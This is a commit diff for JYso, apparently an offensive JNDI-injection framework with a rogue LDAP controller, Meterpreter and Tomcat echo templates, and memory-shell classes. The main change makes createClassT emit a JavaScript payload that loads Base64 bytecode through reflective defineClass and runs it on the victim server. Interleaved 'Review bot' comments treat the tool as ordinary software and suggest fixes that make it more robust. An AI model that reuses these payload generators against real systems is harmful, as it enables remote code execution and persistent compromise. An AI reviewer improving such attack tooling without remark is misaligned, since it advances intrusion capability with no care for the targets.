Add constructor
qi4L committed May 29, 2024
1 parent 751035c commit 72a91dd
Showing 72 changed files with 681 additions and 363 deletions.
Binary file modified .gradle/8.7/checksums/checksums.lock
Binary file not shown.
Binary file modified .gradle/8.7/executionHistory/executionHistory.bin
Binary file not shown.
Binary file modified .gradle/8.7/executionHistory/executionHistory.lock
Binary file not shown.
Binary file modified .gradle/8.7/fileHashes/fileHashes.bin
Binary file not shown.
Binary file modified .gradle/8.7/fileHashes/fileHashes.lock
Binary file not shown.
Binary file modified .gradle/8.7/fileHashes/resourceHashesCache.bin
Binary file not shown.
Binary file modified .gradle/buildOutputCleanup/buildOutputCleanup.lock
Binary file not shown.
Binary file modified .gradle/file-system.probe
Binary file not shown.
2 changes: 1 addition & 1 deletion build.gradle
Expand Up @@ -101,7 +101,7 @@ dependencies {
}

group = 'org.example'
version = '1.3.0'
version = '1.3.1'
description = 'JYso'
java.sourceCompatibility = JavaVersion.VERSION_1_8

3 changes: 2 additions & 1 deletion src/main/java/com/qi4l/jndi/controllers/BasicController.java
Expand Up @@ -9,7 +9,8 @@
import com.qi4l.jndi.gadgets.utils.Util;
import com.qi4l.jndi.gadgets.utils.handle.ClassNameHandler;
import com.qi4l.jndi.template.CommandTemplate;
import com.qi4l.jndi.template.echo.Meterpreter;
import com.qi4l.jndi.template.echoStatic.Meterpreter;
import com.qi4l.jndi.template.echoStatic.TomcatEcho;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,6 @@
import com.qi4l.jndi.gadgets.utils.InjShell;
import com.qi4l.jndi.gadgets.utils.Util;
import com.qi4l.jndi.gadgets.utils.handle.ClassNameHandler;
import com.qi4l.jndi.template.echo.TomcatEchoJndi;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
Expand All @@ -31,7 +30,7 @@ public class TomcatBypassController implements LdapController {
@Override
public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
try {
System.out.println(ansi().render("@|green [+] Sending LDAP ResourceRef result for|@" + base + " @|green with javax.el.ELProcessor payload|@"));
System.out.println(ansi().render("@|green [+] Sending LDAP ResourceRef result for |@" + base + " @|green with javax.el.ELProcessor payload|@"));
System.out.println("-------------------------------------- JNDI Local Refenrence Links --------------------------------------");
Entry e = new Entry(base);
e.addAttribute("javaClassName", "java.lang.String");
Expand All @@ -49,8 +48,7 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
if (payloadType.contains("M-")) {
String ClassName1 = payloadType.substring(payloadType.indexOf('-') + 1);
InjShell.init(params);
Class<?> classQ = Gadgets.createClassT(ClassName1).getClass();
code = InjShell.injectClass(classQ);
code = Gadgets.createClassT(ClassName1);
}

if (payloadType.contains("command")) {
Expand All @@ -61,9 +59,6 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
code = helper.injectMeterpreter();
}

if (payloadType.contains("TomcatEcho111")) {
code = helper.injectTomcatEchoTemplate();
}

String payloadTemplate = "{" +
"\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" +
Expand Down Expand Up @@ -150,10 +145,6 @@ public String injectMeterpreter() throws ClassNotFoundException, NoSuchFieldExce
return InjShell.injectClass(ctClazz);
}

public String injectTomcatEchoTemplate() throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
return InjShell.injectClass(TomcatEchoJndi.class);
}

public String getExecCode(String cmd) throws IOException {

String code = "var strs=new Array(3);\n" +
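Review bot: In `sendResult`, the status line still concatenates `base` into the string handed to `ansi().render(...)`, so any `@|…|@` markup, escape sequence or line break inside `base` is interpreted or printed verbatim on the operator console. `base` appears to be the DN taken from the incoming LDAP search, i.e. text chosen by the remote peer, which would make this a log-injection sink; the commit only adds a space there. Render the fixed parts and append the value separately after stripping control characters, e.g. `ansi().render("@|green [+] Sending LDAP ResourceRef result for |@").a(base.replaceAll("\\p{Cntrl}", "?")).render(" @|green with javax.el.ELProcessor payload|@")`. The banner on the following line also misspells "Reference" as `Refenrence`. The body of `sendResult` continues outside the visible hunks.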
Original file line number Diff line number Diff line change
Expand Up @@ -57,8 +57,7 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
if (payloadType.contains("M-")) {
String ClassName1 = payloadType.substring(payloadType.indexOf('-') + 1);
InjShell.init(params);
Class<?> classQ = Gadgets.createClassT(ClassName1);
code = InjShell.injectClass(classQ);
code = Gadgets.createClassT(ClassName1);
}

if (payloadType.contains("command")) {
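Review bot: The `M-` branch tests `payloadType.contains("M-")` but cuts the class name at the first `-` with `indexOf('-')`, so a value with an earlier hyphen yields the wrong `ClassName1`. The following `if (payloadType.contains("command"))` is not an `else if`, so a value matching both branches would presumably have `code` overwritten without any message. Prefer an exact prefix test, `if (payloadType.startsWith("M-")) { String className = payloadType.substring(2);`, and chain the later branches with `else if`. The same pattern is in the `sendResult` hunk of `TomcatBypassController` earlier in this commit. `sendResult` starts and ends outside this hunk, so whether `code` has a default value is not visible here.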
10 changes: 5 additions & 5 deletions src/main/java/com/qi4l/jndi/gadgets/utils/Cache.java
@@ -1,12 +1,12 @@
package com.qi4l.jndi.gadgets.utils;

import com.qi4l.jndi.template.echo.Meterpreter;
import com.qi4l.jndi.template.echo.SpringEcho;
import com.qi4l.jndi.template.echo.TomcatEcho;
import com.qi4l.jndi.template.echoStatic.Meterpreter;
import com.qi4l.jndi.template.echoStatic.SpringEcho;
import com.qi4l.jndi.template.echoStatic.TomcatEcho;
import com.qi4l.jndi.template.isOK;
import com.qi4l.jndi.template.isSuccess;
import com.qi4l.jndi.template.memshell.Websphere.WebsphereMemshellTemplate;
import com.qi4l.jndi.template.memshell.jboss.JBFMSFromContextF;
import com.qi4l.jndi.template.memshellStatic.Websphere.WebsphereMemshellTemplate;
import com.qi4l.jndi.template.memshellStatic.jboss.JBFMSFromContextF;
import net.jodah.expiringmap.ExpirationPolicy;
import net.jodah.expiringmap.ExpiringMap;

Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
package com.qi4l.jndi.gadgets.utils;

import com.qi4l.jndi.gadgets.Config.Config;
import com.qi4l.jndi.template.echo.Meterpreter;
import com.qi4l.jndi.template.echoStatic.Meterpreter;
import javassist.*;

import java.io.*;
21 changes: 19 additions & 2 deletions src/main/java/com/qi4l/jndi/gadgets/utils/Gadgets.java
Expand Up @@ -7,10 +7,12 @@
import javassist.CtClass;
import javassist.CtConstructor;

import java.io.ByteArrayOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

Expand Down Expand Up @@ -153,7 +155,7 @@ public static Object createTemplatesImpl(String command) throws Exception {
return templates;
}

public static Class<?> createClassT(String command) throws Exception {
public static String createClassT(String command) throws Exception {
command = command.trim();

// 支持单双引号
Expand Down Expand Up @@ -203,7 +205,22 @@ public static Class<?> createClassT(String command) throws Exception {
}
}

return ctClass.getClass();
byte[] bytes = ctClass.toBytecode();
String classCode = Base64.getEncoder().encodeToString(bytes);
//System.out.println("Base64 Encoded CtClass: " + classCode);
ctClass.detach();

return "var bytes = org.apache.tomcat.util.codec.binary.Base64.decodeBase64('" + classCode + "');\n" +
"var classLoader = java.lang.Thread.currentThread().getContextClassLoader();\n" +
"try{\n" +
" var clazz = classLoader.loadClass('" + ctClass.getName() + "');\n" +
" clazz.newInstance();\n" +
"}catch(err){\n" +
" var method = java.lang.ClassLoader.class.getDeclaredMethod('defineClass', ''.getBytes().getClass(), java.lang.Integer.TYPE, java.lang.Integer.TYPE);\n" +
" method.setAccessible(true);\n" +
" var clazz = method.invoke(classLoader, bytes, 0, bytes.length);\n" +
" clazz.newInstance();\n" +
"};";
}

public static String createClassB(String command) throws Exception {
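Review bot: `createClassT` now returns JavaScript source text instead of a `Class<?>`, but its name and the missing Javadoc still suggest a class object, so any caller not updated in this commit that passes the result to `InjShell.injectClass` stops compiling with no hint of the new contract. Add a Javadoc along the lines of `/** Returns a script snippet that defines and instantiates the generated class from its Base64 bytecode; the result is JavaScript source, not a Class. */`. The return expression calls `ctClass.getName()` after `ctClass.detach()`, which the Javassist documentation says must not be done on a detached object; read the name into a local first, `String name = ctClass.getName();`, and use that in the string. The commented-out `System.out.println` should be deleted rather than kept. `java.io.ByteArrayOutputStream` is imported in the first hunk but not used in the visible lines, and the method body between the two hunks is not shown.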
3 changes: 1 addition & 2 deletions src/main/java/com/qi4l/jndi/gadgets/utils/InjShell.java
Expand Up @@ -2,7 +2,7 @@

import com.qi4l.jndi.gadgets.Config.Config;
import com.qi4l.jndi.template.Agent.WinMenshell;
import com.qi4l.jndi.template.memshell.tomcat.TSMSFromJMXF;
import com.qi4l.jndi.template.memshellStatic.tomcat.TSMSFromJMXF;
import javassist.*;
import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.CommandLineParser;
Expand All @@ -16,7 +16,6 @@

import static com.qi4l.jndi.gadgets.Config.MemShellPayloads.*;
import static com.qi4l.jndi.gadgets.utils.HexUtils.generatePassword;
import static com.qi4l.jndi.template.memshell.shell.MemShellPayloads.SUO5.CMD_SHELL_FOR_WEBFLUX;

public class InjShell {

2 changes: 1 addition & 1 deletion src/main/java/com/qi4l/jndi/gadgets/utils/Util.java
@@ -1,6 +1,6 @@
package com.qi4l.jndi.gadgets.utils;

import com.qi4l.jndi.template.echo.Meterpreter;
import com.qi4l.jndi.template.echoStatic.Meterpreter;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
146 changes: 0 additions & 146 deletions src/main/java/com/qi4l/jndi/template/echo/TomcatEchoJndi.java

This file was deleted.
